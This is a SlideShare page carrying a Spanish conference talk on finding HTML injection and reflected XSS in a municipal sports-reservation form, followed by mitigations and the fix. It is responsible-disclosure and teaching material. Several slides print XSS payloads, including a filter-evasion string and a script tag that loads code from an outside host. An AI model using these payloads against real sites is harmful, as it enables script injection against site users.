SlideShare una empresa de Scribd logo

Descubriendo vulnerabilidades en organismo público

Descargar como PPTX, PDF
D
DavidPadillaAlvarado

Ponencia C1B3rwall

Ingeniería
1 de 25
Exponiendo la verdad: descubriendo vulnerabilidades relevantes en un organismo público– HTML Injection y XSS en acción. David Padilla Alvarado https://c1b3rwall.policia.es/
https://c1b3rwall.policia.es/ WHOAMI • Graduado en Ingeniería Telemática (Universidad de Jaén) • Máster oficial en seguridad informática (Universidad Internacional de la Rioja) • Máster propio en seguridad ofensiva (Universidad Católica san Antonio de Murcia) • Máster propio en ciberseguridad empresarial en entornos Microsoft (Verne academy) • Distintas certificaciones de ciberseguridad: eJPT, eWPT, PNPT, CCNA, eCPPTv2,CSX, CPHE,CSFPC,CPHP, entre otros. • Fundador del congreso de ciberseguridad en Jaén (Hack-én): https://hack-en.org/ • Autor del blog de ciberseguridad ciberpadi: https://ciberpadi.es/ • Cibercooperante de INCIBE • Contacto MyPublicInbox: https://mypublicinbox.com/DavidPadilla • Red Team Operator en Plexus Tech
https://c1b3rwall.policia.es/ Ciberataques en España. Según un informe de Deusto Formación sobre Amenazas Globales, los ciberataques están aumentando un 300% desde 2020, y como consecuencia de ello, el 40% de las empresas españolas ya han sufrido un ataque cibernético. Aun así, España está por debajo de países como Estados Unidos, donde el 58% de las compañías son atacadas, o Francia (con el 60%).
https://c1b3rwall.policia.es/ Ciberataques a nivel mundial. Source: https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf Source: https://www.diarioabierto.es/661320/el-cibercrimen-alcanza-un-valor-del-15-del-pib-mundial
https://c1b3rwall.policia.es/ OWASP ¿Qué es OWASP? • Open Web Application Security Project. Es una metodología de seguridad de código abierto y colaborativa que se utiliza como referente para auditorias de seguridad de aplicaciones web. • Organización sin ánimo de lucro. • Materia gratuito y fácilmente accesible en su web. • OWASP Top 10. • Apoyo financiero a través de patrocinadores y empresas. • Promueve el desarrollo seguro.
https://c1b3rwall.policia.es/ OWASP TOP 10 Hay tres nuevas categorías, cuatro categorías con cambios de nombre y alcance, y alguna consolidación en el Top 10 de 2021. Hemos cambiado los nombres cuando ha sido necesario para centrarnos en la causa principal en lugar del síntoma. Source: https://owasp.org/Top10/es/
https://c1b3rwall.policia.es/ HTML Injection La inyección HTML es un tipo de vulnerabilidad de inyección que ocurre cuando un usuario puede controlar un punto de entrada y puede inyectar código HTML arbitrario en una página web vulnerable.
https://c1b3rwall.policia.es/ HTML Injection Un tercero podría aprovechar la incorrecta validación de entrada por parte del usuario para realizar un tipo de ataque que modifique el aspecto visual de la página denominado como defacement. Fuente: https://blog.segu-info.com.ar/2009/12/deface-twitter-por-un-ataque-del.html
https://c1b3rwall.policia.es/ HTML Injection Reflected.
https://c1b3rwall.policia.es/ HTML Injection Stored.
https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Es una inyección de código malicioso, que se ejecutará en el navegador de la víctima. El script malicioso puede guardarse en el servidor web y ejecutarse cada vez que el usuario llame a la funcionalidad correspondiente. También se puede realizar sin ningún script guardado en el servidor web.
https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Reflected. Se descubrió una vulnerabilidad XSS reflected en Nagios Log Server (CVE-2021-35478). URL: GET /nagioslogserver/admin/audit-log?time=24h start= end= type= search= HTTP/1.1. La hora, el inicio, el final, el tipo y el parámetro de búsqueda eran vulnerables a Reflected XSS. GET /nagioslogserver/admin/audit-log?time=24h"><script>alert(1)</script> start= end= type= search= HTTP/1.1
https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Stored. El parámetro pp para los resultados por página en el registro de auditoría y la página del historial de alertas era vulnerable a Stored XSS.
https://c1b3rwall.policia.es/ Exponiendo la verdad. Se descubrió una vulnerabilidad web dentro del patronato de deportes de un Ayuntamiento el cual un tercero podría aprovecharse del hecho de la ausencia de validación de la entrada por parte del usuario para realizar distintos tipos de ataques web. En concreto, a la hora de hacer clic en un espacio libre para reservar una pista deportiva, tecnologías como Jquery, Bootstrap, ASP.NET (2012) se encontraban totalmente desactualizados y fuera de soporte dando lugar a posibles exploits en recursos como exploit-db entre otros.
https://c1b3rwall.policia.es/ Exponiendo la verdad. HTML Injection. Se pudo confirmar que el campo del formulario ‘Datos del envío del justificante’ no presentaba una restricción de caracteres especiales, en concreto los etiquetado de apertura y cierre de etiquetas como html ‘<‘,’>’, que podían permitir a un tercero inyectar código malicioso.
https://c1b3rwall.policia.es/ Pero no todo son buenas noticias…
https://c1b3rwall.policia.es/ Restricción de caracteres. La protección ASP.NET permitía que hubiese restricción de caracteres. Se probó un conjunto de payloads por un diccionario dado y se observó que solamente se podían inyectar ciertos caracteres. (Consejo para profesionales de red team el siguiente recurso XSS Filter Evasion by OWASP: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) Véase el caso del ejemplo: <h1/onmouseover='u0061lert(1)'>%00
https://c1b3rwall.policia.es/ Exponiendo la verdad. ¿Y si probamos con etiquetas propias de JavaScript?...
https://c1b3rwall.policia.es/ Exponiendo la verdad. 1. Dado este punto intenté ‘jugar’ con el servidor para ver en qué punto me aceptaba como máximo la inyección de caracteres. Por ejemplo tomé este payload: <script/src=//NJ.₨></script> y la respuesta del servidor fue la siguiente: Casi…. 2. Probé ahora con el siguiente payload más acotado: <script src=//a.io> . La respuesta del servidor vez fue la siguiente: 3. Fui a la consola y efectivamente vi que se hacia una llamada al recurso www.a.io . Es decir, se puede apuntar a cargar script malicioso y realizar una petición frente a ese script.
https://c1b3rwall.policia.es/ Exponiendo la verdad. XSS. Como podía ejecutar de manera delimitada ciertos comandos, busqué el ansiado XSS, para ello utilicé Burpsuite y ejecuté un diccionario dentro de Intruder para realizar un ataque que no fuera manual para ser eficiente.
https://c1b3rwall.policia.es/ Exponiendo la verdad. XSS. Se trata de un XSS reflected. No tiene una severidad tan alta como un stored podía llevar a cabo una ejecución de código malicioso.
https://c1b3rwall.policia.es/ Medidas de mitigación. 1. Validar la entrada por parte del usuario. Los datos que no son de confianza son cualquier dato que un atacante pueda controlar, entradas de formulario HTML, cadenas de consulta, encabezados HTTP, incluso datos procedentes de una base de datos, ya que un atacante puede infringir la base de datos incluso si no pueden infringir la aplicación. 2. Implementar un ciclo de vida de desarrollo seguro SDLC en el que se involucre en un proceso de auditoría de código a los programadores encargados de lanzar un producto en un entorno de pre producción hasta un entorno final de producción. 3. Realizar auditorías continuas de código estático y código dinámico que puedan permitir detectar vulnerabilidades en el activo. 4. La aplicación no debe aceptar ningún script, carácter especial o código HTML en los campos cuando no sea necesario. Debe evitar los caracteres especiales que pueden resultar dañinos. Algunos de los personajes principales utilizados en los guiones que deben evitarse son los siguientes: < > ( ) ' “ / * ; : = { } `(comilla grave) % + ^ ! — x00-x20 (x es una notación hexadecimal; incluye Espacio, Tabulador, Retorno de carro y Avance de línea). 5. Habilitar una Política de Seguridad de Contenido (CSP) supone una defensa profunda para la mitigación de vulnerabilidades XSS. 6. Codificar todas las salidas dentro del sitio, es decir, sustituir caracteres de toda aquella cadena que desee mostrarse en pantalla por ejemplo sustituir los símbolos de menor y mayor que por sus codificaciones correspondientes para html: &lt; y &gt; respectivamente. 7. Uso del atributo Secure y HttpOnly en las cookies.
https://c1b3rwall.policia.es/ Respuesta del organismo público. Finalmente el organismo público pudo subsanar la vulnerabilidad, ejecutó una de las recomendaciones que se propuso como era impedir la inyección de caracteres especiales y actualmente no es posible realizar este tipo de ataques web asi como enviaron un email de agradecimiento.
https://c1b3rwall.policia.es/ Conclusiones. En conclusión, en esta ponencia he tratado de dar importancia a: • El proceso de ciberseguridad en una empresa ya sea dentro del sector privado o publico forma parte de todos. • Los organismos deberían de dejar de ver la ciberseguridad como un gasto. • Es recomendable realizar un ciclo de vida de desarrollo seguro en cualquier aplicación que se vaya a implementar en un sistema de producción. • En los organismos públicos y fruto de la transformación digital es adecuado que los profesionales de la ciberseguridad vayamos con ellos en ir transformando el ecosistema digital que tenemos en España hacia un espacio más seguro. • Lo más importante bajo mi punto de vista y si habéis visto los detalles que he dejado en los anteriores slides…
https://c1b3rwall.policia.es/ MUCHAS GRACIAS ¿ALGUNA PREGUNTA? https://www.linkedin.com/in/davidpadillaalvarado/ davidpadillateleco@gmail.com https://ciberpadi.es/

Recomendados

Xss con javascript
Xss con javascriptXss con javascript
Xss con javascriptAlan Resendiz
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)kernelinux
 
Racciatti Html Scripting Attacks
Racciatti Html Scripting AttacksRacciatti Html Scripting Attacks
Racciatti Html Scripting AttacksCristian Borghello
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Seguridad en la web no confíes en el usuario
Seguridad en la web no confíes en el usuarioSeguridad en la web no confíes en el usuario
Seguridad en la web no confíes en el usuarioCarlos Soriano
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones webAlan Resendiz
 
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Alonso Caballero
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 

Recomendados

Xss con javascript
Xss con javascriptXss con javascript
Xss con javascriptAlan Resendiz
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)kernelinux
 
Racciatti Html Scripting Attacks
Racciatti Html Scripting AttacksRacciatti Html Scripting Attacks
Racciatti Html Scripting AttacksCristian Borghello
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Seguridad en la web no confíes en el usuario
Seguridad en la web no confíes en el usuarioSeguridad en la web no confíes en el usuario
Seguridad en la web no confíes en el usuarioCarlos Soriano
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones webAlan Resendiz
 
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Alonso Caballero
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 
Xss a fondo
Xss a fondoXss a fondo
Xss a fondoAlan Resendiz
 
Que es xss
Que es xssQue es xss
Que es xssJames Jara
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas webFacultad de Ciencias y Sistemas
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones WebCarlos Fernandez
 
Websecurify an dwebgoat terminado
Websecurify an dwebgoat terminadoWebsecurify an dwebgoat terminado
Websecurify an dwebgoat terminadoAraceli Rodriguez
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebAlonso Caballero
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Andrés Gómez
 
Vulnerabilidades web
Vulnerabilidades webVulnerabilidades web
Vulnerabilidades webJoshimar Castro Siguas
 
CodeCamp 2010 | Diez formas de escribir código (in)seguro
CodeCamp 2010 | Diez formas de escribir código (in)seguroCodeCamp 2010 | Diez formas de escribir código (in)seguro
CodeCamp 2010 | Diez formas de escribir código (in)seguroMicrosoft Argentina y Uruguay [Official Space]
 
From vulnerable source to shell in two hours
From vulnerable source to shell in two hoursFrom vulnerable source to shell in two hours
From vulnerable source to shell in two hoursOwaspMadrid Chapter
 
Seguridad en php
Seguridad en phpSeguridad en php
Seguridad en phpRicardo Joel Robinson Gonzalez
 
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Alonso Caballero
 
Temas owasp
Temas owaspTemas owasp
Temas owaspFernando Solis
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3tantascosasquenose
 
Seguridad web
Seguridad webSeguridad web
Seguridad webcamposer
 
Web app attacks
Web app attacksWeb app attacks
Web app attacksJaime Restrepo
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridadguestbfa74a
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 
Ataques client side exploitation
Ataques client side exploitationAtaques client side exploitation
Ataques client side exploitationjack_corvil
 
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdfTAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdfAntonioGonzalezIzqui
 
Seleccion de Fusibles en media tension fusibles
Seleccion de Fusibles en media tension fusiblesSeleccion de Fusibles en media tension fusibles
Seleccion de Fusibles en media tension fusiblesSaulSantiago25
 

Más contenido relacionado

Similar a Descubriendo vulnerabilidades en organismo público

Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones WebCarlos Fernandez
 
Websecurify an dwebgoat terminado
Websecurify an dwebgoat terminadoWebsecurify an dwebgoat terminado
Websecurify an dwebgoat terminadoAraceli Rodriguez
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebAlonso Caballero
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Andrés Gómez
 
From vulnerable source to shell in two hours
From vulnerable source to shell in two hoursFrom vulnerable source to shell in two hours
From vulnerable source to shell in two hoursOwaspMadrid Chapter
 
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Alonso Caballero
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3tantascosasquenose
 
Seguridad web
Seguridad webSeguridad web
Seguridad webcamposer
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridadguestbfa74a
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 
Ataques client side exploitation
Ataques client side exploitationAtaques client side exploitation
Ataques client side exploitationjack_corvil
 

Similar a Descubriendo vulnerabilidades en organismo público (20)

Xss a fondo
Xss a fondoXss a fondo
Xss a fondo
 
Que es xss
Que es xssQue es xss
Que es xss
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas web
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web
 
Websecurify an dwebgoat terminado
Websecurify an dwebgoat terminadoWebsecurify an dwebgoat terminado
Websecurify an dwebgoat terminado
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones Web
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1
 
Vulnerabilidades web
Vulnerabilidades webVulnerabilidades web
Vulnerabilidades web
 
CodeCamp 2010 | Diez formas de escribir código (in)seguro
CodeCamp 2010 | Diez formas de escribir código (in)seguroCodeCamp 2010 | Diez formas de escribir código (in)seguro
CodeCamp 2010 | Diez formas de escribir código (in)seguro
 
From vulnerable source to shell in two hours
From vulnerable source to shell in two hoursFrom vulnerable source to shell in two hours
From vulnerable source to shell in two hours
 
Seguridad en php
Seguridad en phpSeguridad en php
Seguridad en php
 
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
 
Temas owasp
Temas owaspTemas owasp
Temas owasp
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Web app attacks
Web app attacksWeb app attacks
Web app attacks
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
 
Ataques client side exploitation
Ataques client side exploitationAtaques client side exploitation
Ataques client side exploitation
 

Último

TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdfTAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdfAntonioGonzalezIzqui
 
Seleccion de Fusibles en media tension fusibles
Seleccion de Fusibles en media tension fusiblesSeleccion de Fusibles en media tension fusibles
Seleccion de Fusibles en media tension fusiblesSaulSantiago25
 
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdf
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdfReporte de simulación de flujo del agua en un volumen de control MNVA.pdf
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdfMikkaelNicolae
 
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdfCristhianZetaNima
 
Presentación electricidad y magnetismo.pptx
Presentación electricidad y magnetismo.pptxPresentación electricidad y magnetismo.pptx
Presentación electricidad y magnetismo.pptxYajairaMartinez30
 
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kVEl proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kVSebastianPaez47
 
sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7luisanthonycarrascos
 
ECONOMIA APLICADA SEMANA 555555555555555555.pdf
ECONOMIA APLICADA SEMANA 555555555555555555.pdfECONOMIA APLICADA SEMANA 555555555555555555.pdf
ECONOMIA APLICADA SEMANA 555555555555555555.pdffredyflores58
 
CLASe número 4 fotogrametria Y PARALAJE.pptx
CLASe número 4 fotogrametria Y PARALAJE.pptxCLASe número 4 fotogrametria Y PARALAJE.pptx
CLASe número 4 fotogrametria Y PARALAJE.pptxbingoscarlet
 
Calavera calculo de estructuras de cimentacion.pdf
Calavera calculo de estructuras de cimentacion.pdfCalavera calculo de estructuras de cimentacion.pdf
Calavera calculo de estructuras de cimentacion.pdfyoseka196
 
IPERC Y ATS - SEGURIDAD INDUSTRIAL PARA TODA EMPRESA
IPERC Y ATS - SEGURIDAD INDUSTRIAL PARA TODA EMPRESAIPERC Y ATS - SEGURIDAD INDUSTRIAL PARA TODA EMPRESA
IPERC Y ATS - SEGURIDAD INDUSTRIAL PARA TODA EMPRESAJAMESDIAZ55
 
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONAL
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONALCHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONAL
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONALKATHIAMILAGRITOSSANC
 
Elaboración de la estructura del ADN y ARN en papel.pdf
Elaboración de la estructura del ADN y ARN en papel.pdfElaboración de la estructura del ADN y ARN en papel.pdf
Elaboración de la estructura del ADN y ARN en papel.pdfKEVINYOICIAQUINOSORI
 
Voladura Controlada Sobrexcavación (como se lleva a cabo una voladura)
Voladura Controlada Sobrexcavación (como se lleva a cabo una voladura)Voladura Controlada Sobrexcavación (como se lleva a cabo una voladura)
Voladura Controlada Sobrexcavación (como se lleva a cabo una voladura)ssuser563c56
 
Una estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NISTUna estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NISTFundación YOD YOD
 
Manual_Identificación_Geoformas_140627.pdf
Manual_Identificación_Geoformas_140627.pdfManual_Identificación_Geoformas_140627.pdf
Manual_Identificación_Geoformas_140627.pdfedsonzav8
 
Proyecto de iluminación "guia" para proyectos de ingeniería eléctrica
Proyecto de iluminación "guia" para proyectos de ingeniería eléctricaProyecto de iluminación "guia" para proyectos de ingeniería eléctrica
Proyecto de iluminación "guia" para proyectos de ingeniería eléctricaXjoseantonio01jossed
 
presentacion medidas de seguridad riesgo eléctrico
presentacion medidas de seguridad riesgo eléctricopresentacion medidas de seguridad riesgo eléctrico
presentacion medidas de seguridad riesgo eléctricoalexcala5
 
CLASE - 01 de construcción 1 ingeniería civil
CLASE - 01 de construcción 1 ingeniería civilCLASE - 01 de construcción 1 ingeniería civil
CLASE - 01 de construcción 1 ingeniería civilDissneredwinPaivahua
 
clases de dinamica ejercicios preuniversitarios.pdf
clases de dinamica ejercicios preuniversitarios.pdfclases de dinamica ejercicios preuniversitarios.pdf
clases de dinamica ejercicios preuniversitarios.pdfDanielaVelasquez553560
 

Último (20)

TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdfTAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
 
Seleccion de Fusibles en media tension fusibles
Seleccion de Fusibles en media tension fusiblesSeleccion de Fusibles en media tension fusibles
Seleccion de Fusibles en media tension fusibles
 
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdf
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdfReporte de simulación de flujo del agua en un volumen de control MNVA.pdf
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdf
 
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf
 
Presentación electricidad y magnetismo.pptx
Presentación electricidad y magnetismo.pptxPresentación electricidad y magnetismo.pptx
Presentación electricidad y magnetismo.pptx
 
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kVEl proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
 
sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7
 
ECONOMIA APLICADA SEMANA 555555555555555555.pdf
ECONOMIA APLICADA SEMANA 555555555555555555.pdfECONOMIA APLICADA SEMANA 555555555555555555.pdf
ECONOMIA APLICADA SEMANA 555555555555555555.pdf
 
CLASe número 4 fotogrametria Y PARALAJE.pptx
CLASe número 4 fotogrametria Y PARALAJE.pptxCLASe número 4 fotogrametria Y PARALAJE.pptx
CLASe número 4 fotogrametria Y PARALAJE.pptx
 
Calavera calculo de estructuras de cimentacion.pdf
Calavera calculo de estructuras de cimentacion.pdfCalavera calculo de estructuras de cimentacion.pdf
Calavera calculo de estructuras de cimentacion.pdf
 
IPERC Y ATS - SEGURIDAD INDUSTRIAL PARA TODA EMPRESA
IPERC Y ATS - SEGURIDAD INDUSTRIAL PARA TODA EMPRESAIPERC Y ATS - SEGURIDAD INDUSTRIAL PARA TODA EMPRESA
IPERC Y ATS - SEGURIDAD INDUSTRIAL PARA TODA EMPRESA
 
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONAL
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONALCHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONAL
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONAL
 
Elaboración de la estructura del ADN y ARN en papel.pdf
Elaboración de la estructura del ADN y ARN en papel.pdfElaboración de la estructura del ADN y ARN en papel.pdf
Elaboración de la estructura del ADN y ARN en papel.pdf
 
Voladura Controlada Sobrexcavación (como se lleva a cabo una voladura)
Voladura Controlada Sobrexcavación (como se lleva a cabo una voladura)Voladura Controlada Sobrexcavación (como se lleva a cabo una voladura)
Voladura Controlada Sobrexcavación (como se lleva a cabo una voladura)
 
Una estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NISTUna estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NIST
 
Manual_Identificación_Geoformas_140627.pdf
Manual_Identificación_Geoformas_140627.pdfManual_Identificación_Geoformas_140627.pdf
Manual_Identificación_Geoformas_140627.pdf
 
Proyecto de iluminación "guia" para proyectos de ingeniería eléctrica
Proyecto de iluminación "guia" para proyectos de ingeniería eléctricaProyecto de iluminación "guia" para proyectos de ingeniería eléctrica
Proyecto de iluminación "guia" para proyectos de ingeniería eléctrica
 
presentacion medidas de seguridad riesgo eléctrico
presentacion medidas de seguridad riesgo eléctricopresentacion medidas de seguridad riesgo eléctrico
presentacion medidas de seguridad riesgo eléctrico
 
CLASE - 01 de construcción 1 ingeniería civil
CLASE - 01 de construcción 1 ingeniería civilCLASE - 01 de construcción 1 ingeniería civil
CLASE - 01 de construcción 1 ingeniería civil
 
clases de dinamica ejercicios preuniversitarios.pdf
clases de dinamica ejercicios preuniversitarios.pdfclases de dinamica ejercicios preuniversitarios.pdf
clases de dinamica ejercicios preuniversitarios.pdf
 

Descubriendo vulnerabilidades en organismo público

  • 1. Exponiendo la verdad: descubriendo vulnerabilidades relevantes en un organismo público– HTML Injection y XSS en acción. David Padilla Alvarado https://c1b3rwall.policia.es/
  • 2. https://c1b3rwall.policia.es/ WHOAMI • Graduado en Ingeniería Telemática (Universidad de Jaén) • Máster oficial en seguridad informática (Universidad Internacional de la Rioja) • Máster propio en seguridad ofensiva (Universidad Católica san Antonio de Murcia) • Máster propio en ciberseguridad empresarial en entornos Microsoft (Verne academy) • Distintas certificaciones de ciberseguridad: eJPT, eWPT, PNPT, CCNA, eCPPTv2,CSX, CPHE,CSFPC,CPHP, entre otros. • Fundador del congreso de ciberseguridad en Jaén (Hack-én): https://hack-en.org/ • Autor del blog de ciberseguridad ciberpadi: https://ciberpadi.es/ • Cibercooperante de INCIBE • Contacto MyPublicInbox: https://mypublicinbox.com/DavidPadilla • Red Team Operator en Plexus Tech
  • 3. https://c1b3rwall.policia.es/ Ciberataques en España. Según un informe de Deusto Formación sobre Amenazas Globales, los ciberataques están aumentando un 300% desde 2020, y como consecuencia de ello, el 40% de las empresas españolas ya han sufrido un ataque cibernético. Aun así, España está por debajo de países como Estados Unidos, donde el 58% de las compañías son atacadas, o Francia (con el 60%).
  • 4. https://c1b3rwall.policia.es/ Ciberataques a nivel mundial. Source: https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf Source: https://www.diarioabierto.es/661320/el-cibercrimen-alcanza-un-valor-del-15-del-pib-mundial
